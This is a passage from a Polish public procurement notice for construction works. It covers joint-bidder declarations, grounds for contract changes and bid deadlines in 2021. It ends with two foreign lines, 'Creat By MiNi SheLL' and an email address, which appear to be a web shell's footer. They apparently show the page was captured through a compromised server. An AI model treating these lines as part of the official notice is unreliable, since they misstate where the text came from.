umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do<br/>wykluczenia z postępowania składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania (w<br/>tym także oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art. 125 ust. 1 Pzp) składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego<br/>kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wykonawca jest uprawniony do żądania zmiany Umowy w zakresie Materiałów, parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy w następujących sytuacjach: <br/>a)	konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,<br/>b)	konieczności realizacji robót wynikających z wprowadzenia w Dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a pkt 1 PrBud,<br/>c)	wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,<br/>d)	wystąpienia warunków Terenu budowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,<br/>e)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>f)	wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>g)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.<br/>2.	Wykonawca jest uprawniony do żądania zmiany wynagrodzenia należnego z tytułu realizacji Umowy odpowiednio w przypadkach określonych w pkt 1. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem "Formularza do złożenia, zmiany , wycofania oferty lub wniosku" dostępnego na ePUAP i udostępnionego również na portalu e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com